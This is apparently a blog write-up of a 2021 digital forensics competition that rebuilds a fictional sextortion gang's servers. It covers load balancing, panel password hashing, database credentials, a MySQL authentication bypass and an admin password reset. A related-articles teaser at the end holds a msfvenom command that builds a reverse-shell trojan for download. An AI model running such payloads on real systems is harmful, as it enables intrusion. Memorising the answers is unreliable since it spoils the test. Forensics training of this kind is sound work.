长安杯2021年wp

背景:

2021年4月25日,上午8点左右,警方接到被害人金某报案,声称自己被敲诈数万元;经询问,昨日金某被嫌疑人诱导裸聊,下载了某“裸聊”软件,导致自己的通讯录和裸聊视频被嫌疑人获取,对其进行敲诈,最终金某不堪重负,选择了报警;警方从金某提供的本人手机中,定向采集到了该“裸聊”软件的安装包--zhibo.apk(检材一),请各位回答下列问题:(题目中需要通过分析出来的答案对检材二三四五解压,解压密码为IP的情况,需要在密码后增加-CAB2021,例:192.168.100.100-CAB2021)

检材1&2容器密码:2021第三届CAB-changancup.com

检材1为APK分析,这里专注服务器的复现

检材2

检材2密码:www.honglian7001.com

常规启动火眼还有仿真

直接用仿真仿起来

基础配置要改一下,我建议是根据虚拟机里边的ip改本地虚拟网卡,这样后面重构起来也简单很多

看ip是192.168.110.110

然后修改网卡为nat8,再把本机的nat8修改成192.168.110.0的网段还有其他各种配置

这台服务器有两个用户,别忘了用root进去,不然很受限

12.检材二的原始硬盘的SHA256值为:

火眼查看:

E6873068B83AF9988D297C6916329CEC9D8BCB672C6A894D393E68764391C589

13.查询涉案于案发时间段内登陆服务器的IP地址为【标准格式:111.111.111.111】

192.168.110.203

last 命令

这个命令将显示所有登录、注销和重启记录。

 

 看到这个是有显示的,是在报案前一天登陆的

所以ip是192.168.110.203

14.请对检材二进行分析,并回答该服务器在集群中承担的主要作用是()【格式:文件存储】

负载均衡

15.上一题中,提到的主要功能对应的服务监听的端口为:

看历史命令发现有node命令,查看js版本

并且进了两次opt目录,进去看看

 看到了配置信息

 看到了端口是80

 16.上一题中,提到的服务所使用的启动命令为:

 就是之前看到的node app.js

17.经分析,该服务对于请求来源IP的处理依据是:根据请求源IP地址的第()位进行判断【标准格式:9】

3

 第14题的答案也是在这里出的

这段代码里边,进行了分流,说明进行的是负载均衡,分流到其他的服务器上

这边检验的是第4位,但是因为数组是从0开始的,所以检测的是第三位

18.经分析,当判断条件小于50时,服务器会将该请求转发到IP为()的服务器上【标准格式:111.111.111.111】 

192.168.110.111

 在他上边一点就有,走的是192.168.110.111

19.请分析,该服务器转发的目标服务器一共有几台【标准格式:9】 

三台

上图

20.请分析,受害者通讯录被获取时,其设备的IP地址为【标准格式:111.111.111.111】

192.168.110.252

查看当时的日志就能发现 ,发现4月24的只有一个日志

21.请分析,受害者的通讯录被窃取之后,经由该服务器转发到了IP为()的服务器上【标准格式:111.111.111.111】

192.168.110.113

 同上图

检材3

 通过对检材二的分析,警方进一步掌握并落地到了目标服务器地址,通过对服务器进行证据固定,得到服务器镜像--检材三,请使用第21题答案对检材三进行解密并分析,回答下列问题:

这个检材三是txt文件,用vc挂载解压就行

我们在解密容器后可以得到三个web服务器的镜像(也验证了第19题),但是需要注意此部分题目的要求,需要我们分析目标服务器,也就意味着我们需要先判断出这三个服务器到底哪一个对应着 192.168.110.113,在找到后才能进一步解题

看了web1、web2发现ip分别是111、112,所以目标服务器是web3

22.检材三的原始硬盘的SHA256值为:

火眼直接搞

205C1120874CE0E24ABFB3BB1525ACF330E05111E4AD1D323F3DEE59265306BF

23.请分析第21题中,所指的服务器的开机密码为:

这道题涉及到计算机取证的内容,在计算机取证上看到了xshell连接密码

24.嫌疑人架设网站使用了宝塔面板,请问面板的登陆用户名为:

hl123

 用火眼看或者在命令看

 25.请分析用于重置宝塔面板密码的函数名为

 set_panel_pwd

26.请分析宝塔面板登陆密码的加密方式所使用的哈希算法为 

MD5

 

27.请分析宝塔面板对于其默认用户的密码一共执行了几次上题中的哈希算法 

3

 应该是在public.py里找到,因为在tools.py里边发现了方法都是public.py提供的

 发现在public.py里边有两个,然后tools.py有一个,所以一共是三次加密

28.请分析当前宝塔面板密码加密过程中所使用的salt值为【区分大小写】

火眼能看到盐值

 正常找的话还有有点难度的

在public.py里边有salt的算法,发现是M

在第一行发现了M的方法体,访问的是data下边的default.db

也算是积累经验了

在数据库里边找到盐值

 29.请分析该服务器,网站源代码所在的绝对路径为

/www/wwwroot 

直接启动宝塔就可以了

登录前记得修改密码

30.请分析,网站所使用的数据库位于IP为()的服务器上(请使用该IP解压检材五,并重构网站)【标准格式:111.111.111.111】

192.168.110.115

在网站目录下边

cd www/wwwroot/www.honglian7001/app/

有一个datebase.php,里边就有地址以及数据库密码

31.请分析,数据库的登陆密码为【区分大小写】

wxrM5GtNXk5k5EPX

同上图

32.请尝试重构该网站,并指出,该网站的后台管理界面的入口为【标准格式:/web】

 先解压001文件,然后利用vc挂载打开

发现是dd文件,并且是raid,利用火眼进行重组

发现ip就是115,直接就网站直接起来了

在admin目录里边看下

在进网页看到是登录界面,可以确定是后台了

33.已该涉案网站代码中对登录用户的密码做了加密处理。请找出加密算法中的salt值【区分大小写】 

lshi4AsSUrUOwWV 

在/www/wwwroot/www.honglian7001/app/admin/common.php找到了加密算法以及盐值

34.请分析该网站的管理员用户的密码为: 

可以看日志找到密码

 也可以进数据库找,但是有一点麻烦

mysql -u www_honglian7001 -p wxrM5GtNXk5k5EPX 

先去连接数据库,但是他会提示无法连接

所以就修改mysql的配置文件

vi /etc/my.cnf

加上一句 skip-grant-tables 跳过登录的权限检查,保存后重启mysql服务 service mysqld restart 即可

 

 成功之后利用navicat连接

可以发现admin以及加密后的密码

知道加密后的密码,也知道他的算法,所以就可以修改他的密码进行登录

但是没办法得出他的原密码,因为md5是不可逆的,需要找爆破字典,所以在字典中找就可以了

 以 123456 为例,修改admin密码

 脚本:

import hashlib
def password(password, password_code='lshi4AsSUrUOwWV'):
    # 计算第一个MD5
    md5_password = hashlib.md5(password.encode()).hexdigest()

    # 计算第二个MD5
    md5_password_code = hashlib.md5(password_code.encode()).hexdigest()

    # 组合并计算最终的MD5
    final_md5 = hashlib.md5((md5_password + md5_password_code).encode()).hexdigest()

    return final_md5


plain_password = '123456'
encrypted_password = password(plain_password)

print("原始密码:", plain_password)
print("加密后的密码:", encrypted_password)

成功登录

35.在对后台账号的密码加密处理过程中,后台一共计算几次哈希值 

3次

同33题图

 36.请统计,后台中,一共有多少条设备记录

6002

37. 请通过后台确认,本案中受害者的手机号码为

18644099137 

这道题要通过手机取证去找,找到进入app的时间

还有一种是通过检材2去找

检材二中的日志记录情况 

在2021.4.24  6:37(utc时间)左右上传了通讯录

 其对应的utc+8时间应为  当日14:37左右手机型号也能对上 由此可以得到受害者手机号码

 

38.请分析,本案中受害者的通讯录一共有多少条记录 

 34

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/657170.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

(四十八)第 7 章 图(图的数组(邻接矩阵)存储)

1. 背景说明 2. 示例代码 1) errorRecord.h // 记录错误宏定义头文件#ifndef ERROR_RECORD_H #define ERROR_RECORD_H#include <stdio.h> #include <string.h> #include <stdint.h>// 从文件路径中提取文件名 #define FILE_NAME(X) strrchr(X, \\) ? strrch…

msfconsole攻击win10及简陋版

kali 攻击机IP 192.168.1.19 win10 肉鸡 192.168.1.15 使用 msfvenom 生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.1.19 lport1234 -f exe >muma.exe 接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载&#xff0c;需要做…

深入分析 Android Activity (三)

文章目录 深入分析 Android Activity (三)1. Activity 的配置变化处理1.1 处理配置变化 2. Activity 的存储和恢复状态2.1 保存状态2.2 恢复状态 3. Activity 与 Fragment 的通信3.1 通过接口进行通信3.2 通过 ViewModel 进行通信 4. Activity 的窗口管理和视图层次结构4.1 Dec…

联邦和反射器实验

拓扑图 一.实验要求 1.AS1存在两个环回&#xff0c;一个地址为192.168.1.0/24&#xff0c;该地址不能在任何协议中宣告 AS3存在两个环回&#xff0c;一个地址为192.168.2.0/24&#xff0c;该地址不能在任何协议中宣告 AS1还有一个环回地址为10.1.1.0/24&#xff…

汽车大灯中擎耀智能控制器在车灯智能化配置下的创新与分析

随着科技的飞速发展&#xff0c;汽车工业也在不断地进行着革新。其中&#xff0c;车灯作为汽车的重要组成部分&#xff0c;其智能化配置已经成为汽车行业的一大趋势。这种趋势不仅为消费者带来了更加安全、便捷的驾驶体验&#xff0c;同时也为商家提供了丰富的商业机会。汽车工…

Vue3+vite项目中使用mock模拟接口

安装依赖 分别安装vite-plugin-mock跟mockjs两个插件 npm install -D vite-plugin-mock mockjs vite.config.ts中添加配置&#xff0c;主要是红色标记的配置 注意此处如果配置出错可能是vite-plugin-mock依赖的版本有问题&#xff0c;重新安装一下依赖指定版本即可&#xf…

httpJVM

目录 HTTPS如何保证安全 1&#xff09;引入非对称加密 2&#xff09;引入非对称加密 3.中间人攻击 4.解决中间人攻击 JVM 1.JVM内存划分 2.JVM类加载过程 八股内容 3.JVM中的垃圾回收机制 释放垃圾的策略 1.标记-清除 2.复制算法 3.标记-整理 分代回收 HTTPS如何…

《老挝语翻译通》App彻底解决老挝文字OCR识别问题,支持老挝中文翻译、图片识别和语音识别翻译,还支持老挝语学习背单词!

在现今这个全球化的世界中&#xff0c;翻译工具已经成为了我们生活中不可或缺的一部分。对于出国旅行或者需要到老挝工作的人来说&#xff0c;老挝语翻译通App将是你最得力的伙伴。 丰富的功能&#xff0c;简洁的页面 老挝语翻译通App是一款专为广大需要使用老挝语、汉语的人们…

Monaco-Editor在Vue中使用(实现代码编辑与diff代码比较)--类似vscode代码编辑器

Monaco-Editor 是一个由 Microsoft 开发的 Web 代码编辑器&#xff0c;它是 Visual Studio Code 的浏览器版本。在 Vue 项目中集成 Monaco-Editor 可以提供代码编辑、语法高亮、智能提示等功能 效果&#xff1a; 1、安装使用&#xff0c;最好安装指定版本&#xff0c;我是 vue…

【Unity脚本】Unity中如何按类型查找游戏对象(GameObject)

【知识链】Unity -> 脚本系统 -> 访问游戏对象 -> 按类型访问游戏对象摘要&#xff1a;本文介绍了Unity中按类型查找游戏对象&#xff08;GameObject&#xff09;的五种方法&#xff0c;并提出了使用这些方法的最佳实践。 本文目录 一、访问游戏对象的方法二、如何按…

Notepad++不显示CRLF的方法

View -> Show Symbol -> 去掉勾选 Show All Characters

详解makefile中的foreach

在 Makefile 中&#xff0c;foreach 函数用于迭代处理一个以空格分隔的列表&#xff0c;并针对列表中的每个元素执行相同的操作。这个函数通常用于循环处理一组变量或文件名&#xff0c;并执行相同的规则或命令。 语法&#xff1a; makefile Copy Code $(foreach var, list, …

定位器与PWM的LED控制

文章目录 一、STM32定时器二、脉宽调制pwm三、定时器控制led&#xff08;1&#xff09;实验内容&#xff08;2&#xff09;创建工程&#xff08;3&#xff09;Keli程序&#xff08;4&#xff09;观察波形图&#xff08;5&#xff09;实物连接图&#xff08;6&#xff09;实践效…

nginx源码阅读理解 [持续更新,建议关注]

文章目录 前述一、nginx 进程模型基本流程二、源码里的小点1.对字符串操作都进行了原生实现2.配置文件解析也是原生实现待续 前述 通过对 nginx 的了解和代码简单阅读&#xff0c;发现这个C代码的中间件确实存在过人之处&#xff0c;使用场景特别多&#xff0c;插件模块很丰富…

【易错题】数据可视化基础练习题(30道选择题)#CDA Level 1

本文整理了数据可视化基础知识相关的练习题&#xff0c;共30道&#xff0c;适用于想巩固数据可视化知识的同学&#xff0c;也可作为备考CDA一级的补充习题。来源&#xff1a;如荷学数据科学题库&#xff08;技术专项-可视化&#xff09;。 1&#xff09; 2&#xff09; 3&…

EtherCAT协议概述

EtherCAT 是由德国 BECKOFF 自动化公司于2003年提出的实时工业以太网技术。它具有高速和高数据有效率的特点&#xff0c;支持多种设备连接拓扑结构。其从站节点使用专用的控制芯片&#xff0c;主站使用标准的以太网控制器。 EtherCAT 的主要特点如下 : ①泛的适用性&#xff0c…

SQL刷题笔记day4补

1题目 我的正确代码 select e.last_name,e.first_name,d.dept_name from employees e left join (select departments.dept_name,dept_emp.emp_no,dept_emp.dept_no from departments join dept_emp on departments.dept_nodept_emp.dept_no) d on e.emp_nod.emp_no复盘&…

【全开源】Java养老护理助浴陪诊小程序医院陪护陪诊小程序APP源码

打造智慧养老服务新篇章 一、引言&#xff1a;养老护理的数字化转型 随着老龄化社会的到来&#xff0c;养老护理需求日益凸显。为了更好地满足老年人及其家庭的需求&#xff0c;我们推出了养老护理助浴陪诊小程序系统源码。该系统源码旨在通过数字化技术&#xff0c;优化养老…

ORA-12514:TNS:监听程序当前无法识别连接描述符中请求的服务

ORA-12514&#xff1a;TNS&#xff1a;监听程序当前无法识别连接描述符中请求的服务 问题描述&#xff1a; 解决方案&#xff1a; 1、检查oracle的监听服务是否运行正常 1)点击键盘的winr&#xff0c;输入services.msc&#xff0c;点击确认/回车键&#xff1b; 2&#xff09;查…

GO语言 gin框架 简述

原文地址 基本路由 Go语言中文文档 一、简介 Gin是一个golang的轻量级web框架&#xff0c;性能不错&#xff0c;API友好。 Gin支持Restful风格的API&#xff0c;可以直接从URL路径上接收api参数或者URL参数&#xff0c;也可是使用json或者表单 数据绑定的方式接收参数。 Gin响…